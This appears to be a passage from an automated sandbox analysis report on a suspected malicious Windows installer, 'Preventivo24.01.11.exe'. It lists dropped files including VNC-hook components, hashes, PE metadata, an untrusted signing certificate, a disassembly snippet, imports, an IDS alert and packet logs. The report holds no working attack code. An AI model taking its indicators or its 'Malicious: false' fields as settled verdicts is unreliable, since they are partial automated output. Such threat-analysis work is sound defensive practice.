Category:	dropped
Size (bytes):	976384
Entropy (8bit):	6.553744622059538
Encrypted:	false
SSDEEP:	24576:m7bYOINVUuD6yS1wGbXpsHzCsa1fLK/hVrA:m7bYO+UuD6ySaGbX+H9at+hVrA
MD5:	AA6C669C39D9BE8B6289F10DAAFBA6F3
SHA1:	A7A73BD177B58847F42DAE48DA443E33482DD337
SHA-256:	C5BF02C8C23DBF8798D87FAD91EA44A3153FC1026248BD931F360BA0D6C5989E
SHA-512:	1A7A272E63BEDA9B887158E8187C5D8A2351B21FDF912951555CF0DB9F693A4C92DEC4628C9FFE2E535D7FB869E03C12EB236DC8FD21E2118ED1BF193A010E93
Malicious:	false
Preview:	......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<.............../...#........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...-.......3...0...@...1...2...5...4...=...6...7...8...9...:...;.......e...>...?...D...A...B...C.......E...^...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]......._...`...a...b...c...d...f...y...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...z.......

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2648008
Entropy (8bit):	6.675995874896264
Encrypted:	false
SSDEEP:	49152:Z2snRpZfSwHuWoeeArWCPu6xec3dAAUA/JNw:YsR7Xl7pu6x/I
MD5:	663FE548A57BBD487144EC8226A7A549
SHA1:	6F3E790D8E42A7C1655C37A64852BAB9EEAADCEE
SHA-256:	3FB38EEFB8DB4D52BE428FACC8A242997AB2AD58A8D08980A7688C9BF0B30454
SHA-512:	63203A0FC98E9158AEB5C668FE093A1B1C11565D1222F48F259325EE2E715038A2585F9C307047E33FA778877C2129D926A0D15BFED6B6638E4AE01B78786A6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......+.meo..6o..6o..6...7c..6...7...6...7{..6...6a..6=..7{..6=..7u..6=..7_..6...7H..6o..6C..6...7n..6o..6...6...7r..6...7..6...7n..6...6n..6o..6n..6...7n..6Richo..6........PE..L...3*4e.....................>......3.............@.......................... 0.......(...@.................................d...,.....".(............@(..'...`/. ...`~..8............................~..@............................................text...F........................... ..`.rdata..z=.......>..................@..@.data...............................@....rsrc...(.....".....................@..@.reloc.. ....`/.......'.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	412832
Entropy (8bit):	6.584221629525791
Encrypted:	false
SSDEEP:	12288:zeLkVzUuD6yjqilGbz+ytVYeVhu1CeYv5dSCsHBl:z0klUuD6yjqwGb3YKndxsD
MD5:	29ED7D64CE8003C0139CCCB04D9AF7F0
SHA1:	8172071A639681934D3DC77189EB88A04C8BCFAC
SHA-256:	E48AAC5148B261371C714B9E00268809832E4F82D23748E44F5CFBBF20CA3D3F
SHA-512:	4BDD4BF57EAF0C9914E483E160182DB7F2581B0E2ADC133885BF0F364123D849D247D3F077A58D930E80502A7F27F1457F7E2502D466AEC80A4FBEEBD0B59415
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.5E0.[.0.[.0.[.$.X.>.[.$.^...[..._.!.[...X.'.[...^.`.[.$._.'.[.$.].1.[.$.Z.#.[.0.Z...[...R.#.[....1.[.0...1.[...Y.1.[.Rich0.[.................PE..L...f..^.........."......z...........P............@..................................#....@.................................h........0...............2.......@..<;.....p...........................@...@............................................text....x.......z.................. ..`.rdata...S.......T...~..............@..@.data....6..........................@....rsrc........0......................@..@.reloc..<;...@...<..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	87728
Entropy (8bit):	6.419830608221278
Encrypted:	false
SSDEEP:	1536:IOmWBhamWHh2ZAErVlIwHnURbrK3qCLZO8asWgcdle0yBCaaeJH47EcS:IOmo9rJVltnURbMsxletBCaaeJH47EcS
MD5:	7065625D4F5E1730EADE5A9B4B5A6948
SHA1:	A8F96C8708E0BD23FC9F0B959C49863080A188DD
SHA-256:	4D12FEBD622266220AA2DD2074972EE82545C144DC599F68866212A29DB9F442
SHA-512:	A55E9F1581E3410989EE9C0DAC394E0CF3E3085CAF623F6082E2B3C06A776789B86B87CF17CEEAF582B762B2D6B3C1D554B67A91AE7F87782BC5B6DCCD082186
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... . -djN~djN~djN~p.M.njN~p.K..jN~p.J.vjN~..K.EjN~..J.kjN~..M.ujN~p.O.mjN~djO~.jN~..K.ejN~..N.ejN~...~ejN~dj.~ejN~..L.ejN~RichdjN~........................PE..L...o.&a...........!.................%..............................................&................................'.......(..d....`...............<.......p..........T...........................0...@............................................text............................... ..`.rdata...a.......b..................@..@.data........@......................@....rsrc........`.......&..............@..@.reloc.......p.......,..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {1CBDA787-08B6-4366-B2DC-C0D053E322DE}, Number of Words: 8, Subject: Photo and vn, Author: Photo and Fax Vn, Name of Creating Application: Photo and vn (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Photo and vn. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jan 14 08:14:24 2024, Last Saved Time/Date: Sun Jan 14 08:14:24 2024, Last Printed: Sun Jan 14 08:14:24 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	2615808
Entropy (8bit):	6.621481030425916
Encrypted:	false
SSDEEP:	49152:tt/eWK9YwPhH9D+g5jv5m36W547vB+gjB1JMDhB5geIF/bseA:zmD+cmqvPjB1cE
MD5:	ADC098D9A02A0A0710E8A7D6D2BFEA1D
SHA1:	46167254D9A5475A3D0A36DCDB7F4031A8B148D1
SHA-256:	B73B46F35142989A10C91AA887F94037271B8EE7148CC3BFB061AE9848ED1FD9
SHA-512:	6B8C29E98E246BC60FD612DC9ACC80760000EE9867A7B656B9CD4201831559A62C1DB9278282E6F63692EE7EE71DEEC62163C8C41F9174D7255BFD1427B6CF8F
Malicious:	false
Preview:	......................>...................(...................................M.......f.......S...T...U...V...W...X...Y.......O...P...Q...R...S...T...U...V...W...X...Y...Z...?...@...A...B...C...D...E...F...G...H...I...J...K...L.......................................................................................................................................................................................................................................................................................................<...................1...;....................................................................................... ...!..."...#...$...%...0...'...(...)...*...+...,...-......./.......2...8...3...4...5...6...7...<...9...:...C...F...=...>...?...@...A...B...C...D...E...O...G...H...I...J...K...L...F.......O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\holder0.aiph

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	data
Category:	dropped
Size (bytes):	4488558
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	E819399D28E8E9609668E3A7D70D66A6
SHA1:	F0DD69687E297372EEFD387BA470EFC23A40F7A8
SHA-256:	54B022ED416A22F82DF0B5C7A360E3923AF35ACEE6A6BAC7410B53B5EC8FBB63
SHA-512:	A0429517A6B86084267230E47404195C15C330B5F9F567693924B702CE7874DACD47B273F0964442C1BE3E97D11962189D2F0B07D24EB8A9AED9C26470278925
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.208966082694623
Encrypted:	false
SSDEEP:	3:nLWGWNI3ov:nyGWNOov
MD5:	F2CE4C29DC78D5906090690C345EAF80
SHA1:	D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
SHA-256:	0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
SHA-512:	51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
Malicious:	false
Preview:	No Instance(s) Available....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.1874503350805945
Encrypted:	false
SSDEEP:	3:OT2egJgkuLekbevn:OC39uLevn
MD5:	C80A61EC2FFEB4F20A47DF967C372762
SHA1:	D8C7166F59BB7022A966455DE5256C9A248D8B07
SHA-256:	B29385F78B29999A6E4A4133262F5AF567372A4E30C4023E20AD0899B023B76E
SHA-512:	CFB36B5FD2B5B17F9B93EC4D83286CD6F1F7B56FEC378F816055B46075386E5D9763B2435D0685410002934E74FFC94EA2E822E18C732CD5D0032856F87FAE89
Malicious:	false
Preview:	Environment variable GUID[ not defined..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.141133782753418
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Preventivo24.01.11.exe
File size:	5'955'744 bytes
MD5:	32f35b78a3dc5949ce3c99f2981def6b
SHA1:	18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256:	0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
SHA512:	e14962926f7544f894b84b3091b884b2f9b54c8b40e44e55c43b2df112d68555ddfca268353e278651cc7994011e456ac4515f1b7f0787e499f19dbd75d95cb5
SSDEEP:	98304:7azvMgOJRWT7tRyYsQdTEDdoJr7dJDqpbhUwkasM+u1JfJXibUPHI:7azvMgOJRWT7ukTE5oNqZX1WUA
TLSH:	0C569D30B15AC62ED56241F1192CDAAB911D6D3A0F6190DBB3DC7E6F2BB04C35236E27
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ul..1...1...1...............0...7...%...7...(...7...\.......=.......*.......8.......0...1.......\.......\.l.0...1...0...\...0..

File Icon


Icon Hash:	30281012004140c2

Static PE Info

General

Entrypoint:	0x60b100
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6582CD64 [Wed Dec 20 11:17:56 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	36aca8edddb161c588fcf5afdc1ad9fa

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=CodeSigningCert
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	28/02/2023 11:15:47 28/02/2025 11:25:47
Subject Chain	CN=CodeSigningCert
Version:	3
Thumbprint MD5:	5082070071D2E70CFB8AF6145E2E0DAD
Thumbprint SHA-1:	A1846ABF798522A5B115A90F5C3283CE050626F2
Thumbprint SHA-256:	0C21B06B3EDE50F24284DDB567B4370193279F3E59A9A1BB602D9A9C230B4D28
Serial:	12E79E88324CCEA94E0358CCB4A75075

Entrypoint Preview

Instruction
call 00007FED44B96F8Bh
jmp 00007FED44B967CDh
push ebp
mov ebp, esp
and dword ptr [0074EC4Ch], 00000000h
sub esp, 24h
or dword ptr [0074B020h], 01h
push 0000000Ah
call dword ptr [00697268h]
test eax, eax
je 00007FED44B96B02h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp-08h], eax
xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
nop
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
or eax, dword ptr [ebp-08h]
or eax, edi
mov dword ptr [ebx+04h], esi
mov dword ptr [ebx+08h], ecx
mov dword ptr [ebx+0Ch], edx
jne 00007FED44B96995h
mov eax, dword ptr [ebp-24h]
and eax, 0FFF3FF0h
cmp eax, 000106C0h
je 00007FED44B96975h
cmp eax, 00020660h
je 00007FED44B9696Eh
cmp eax, 00020670h
je 00007FED44B96967h
cmp eax, 00030650h
je 00007FED44B96960h
cmp eax, 00030660h
je 00007FED44B96959h
cmp eax, 00030670h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x349108	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x359000	0x56a58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5adb10	0x590
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3b0000	0x2d550	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2eb4b0	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2eb540	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2bcb50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x297000	0x320	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3463bc	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x295bca	0x295c00	9df1023178e489408abd4de59ea6f5ec	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x297000	0xb3362	0xb3400	1a85f2a6b8a9c3902456bab47389e1fe	False	0.32838378225244075	data	5.079377208024134	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x34b000	0xcc00	0x3400	97e28501cab3e5e33657a71481a58ba7	False	0.23963341346153846	data	4.542379696709195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x358000	0x710	0x800	1b38fc929380aabe59305fcde2681d14	False	0.40966796875	data	4.5338796899883915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x359000	0x56a58	0x56c00	41897894c7d6aefff121b66fdd927208	False	0.11699049891930836	data	4.274410528854854	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3b0000	0x2d550	0x2d600	b8dcb36c465b4630e3506c3a7521632f	False	0.4789568267906336	data	6.568383422414792	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x3598e0	0x13e	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colors	English	United States	0.25471698113207547
RT_BITMAP	0x359a20	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.03017241379310345
RT_BITMAP	0x35a248	0x48a8	Device independent bitmap graphic, 290 x 16 x 32, image size 0	English	United States	0.11881720430107527
RT_BITMAP	0x35eaf0	0xa6a	Device independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/m	English	United States	0.21680420105026257
RT_BITMAP	0x35f55c	0x152	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colors	English	United States	0.5295857988165681
RT_BITMAP	0x35f6b0	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.4875478927203065
RT_ICON	0x35fed8	0x2b528	Device independent bitmap graphic, 256 x 336 x 32, image size 172032, resolution 2834 x 2834 px/m	English	United States	0.11184685090843514
RT_ICON	0x38b400	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08703319502074688
RT_ICON	0x38d9a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.16463414634146342
RT_ICON	0x38ea50	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.18565573770491803
RT_ICON	0x38f3d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3262411347517731
RT_DIALOG	0x38f840	0xac	data	English	United States	0.7151162790697675
RT_DIALOG	0x38f8ec	0xcc	data	English	United States	0.6911764705882353
RT_DIALOG	0x38f9b8	0x1b4	data	English	United States	0.5458715596330275
RT_DIALOG	0x38fb6c	0x136	data	English	United States	0.6064516129032258
RT_DIALOG	0x38fca4	0x4c	data	English	United States	0.8289473684210527
RT_STRING	0x38fcf0	0x234	data	English	United States	0.4645390070921986
RT_STRING	0x38ff24	0x182	data	English	United States	0.5103626943005182
RT_STRING	0x3900a8	0x50	data	English	United States	0.7375
RT_STRING	0x3900f8	0x9a	data	English	United States	0.37662337662337664
RT_STRING	0x390194	0x2f6	data	English	United States	0.449868073878628
RT_STRING	0x39048c	0x5c0	data	English	United States	0.3498641304347826
RT_STRING	0x390a4c	0x434	data	English	United States	0.32899628252788105
RT_STRING	0x390e80	0x100	data	English	United States	0.5703125
RT_STRING	0x390f80	0x484	data	English	United States	0.39186851211072665
RT_STRING	0x391404	0x1ea	data	English	United States	0.44081632653061226
RT_STRING	0x3915f0	0x18a	data	English	United States	0.5228426395939086
RT_STRING	0x39177c	0x216	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.46254681647940077
RT_STRING	0x391994	0x624	data	English	United States	0.3575063613231552
RT_STRING	0x391fb8	0x660	data	English	United States	0.3474264705882353
RT_STRING	0x392618	0x2e2	data	English	United States	0.4037940379403794
RT_GROUP_ICON	0x3928fc	0x14	data	English	United States	1.2
RT_VERSION	0x392910	0x30c	data	English	United States	0.441025641025641
RT_HTML	0x392c1c	0x3835	ASCII text, with very long lines (443), with CRLF line terminators	English	United States	0.08298005420807561
RT_HTML	0x396454	0x1316	ASCII text, with CRLF line terminators	English	United States	0.18399508800654932
RT_HTML	0x39776c	0x8c77	HTML document, ASCII text, with CRLF line terminators	English	United States	0.08081426068578103
RT_HTML	0x3a03e4	0x6acd	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10679931238798873
RT_HTML	0x3a6eb4	0x6a2	HTML document, ASCII text, with CRLF line terminators	English	United States	0.3486454652532391
RT_HTML	0x3a7558	0x104a	HTML document, ASCII text, with CRLF line terminators	English	United States	0.2170263788968825
RT_HTML	0x3a85a4	0x15b1	HTML document, ASCII text, with CRLF line terminators	English	United States	0.17612101566720692
RT_HTML	0x3a9b58	0x205c	exported SGML document, ASCII text, with very long lines (659), with CRLF line terminators	English	United States	0.13604538870111058
RT_HTML	0x3abbb4	0x368d	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10834228428213391
RT_MANIFEST	0x3af244	0x813	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.41025641025641024

Imports

DLL

Import

KERNEL32.dll

WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, CreateSemaphoreW, ReleaseSemaphore, GlobalMemoryStatus, GetModuleHandleA, GetProcessAffinityMask, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetEnvironmentStringsW, InitializeCriticalSectionEx, CloseHandle, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW, LoadLibraryA, CreateFileW

imagehlp.dll

SymGetModuleBase, SymFunctionTableAccess, SymGetLineFromAddr, SymSetSearchPath, SymCleanup, SymInitialize, SymSetOptions, StackWalk

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308	TCP	2834928	ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller)	49705	80	192.168.2.5	93.184.216.34

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 12:17:58.867115021 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:58.969831944 CET	80	49729	93.184.216.34	192.168.2.4
Jan 23, 2024 12:17:58.969996929 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:58.970385075 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:59.072958946 CET	80	49729	93.184.216.34	192.168.2.4
Jan 23, 2024 12:17:59.073906898 CET	80	49729	93.184.216.34	192.168.2.4
Jan 23, 2024 12:17:59.074006081 CET	80	49729	93.184.216.34	192.168.2.4
Jan 23, 2024 12:17:59.074079037 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:59.074244976 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:59.078406096 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:17:59.078449011 CET	49729	80	192.168.2.4	93.184.216.34
Jan 23, 2024 12:18:17.642659903 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.642687082 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.643018007 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.643337965 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.643349886 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.886384010 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.887391090 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.887402058 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.888324022 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.888484001 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.888489962 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.888566971 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.891391039 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.891453028 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:17.891575098 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:17.891587019 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.082823992 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.117850065 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.118026018 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.118132114 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.119770050 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.119770050 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.119786978 CET	443	49738	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.120383978 CET	49738	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.124455929 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.124546051 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.124893904 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.124893904 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.124977112 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.365804911 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.367043018 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.367068052 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.368156910 CET	443	49740	52.202.204.11	192.168.2.4
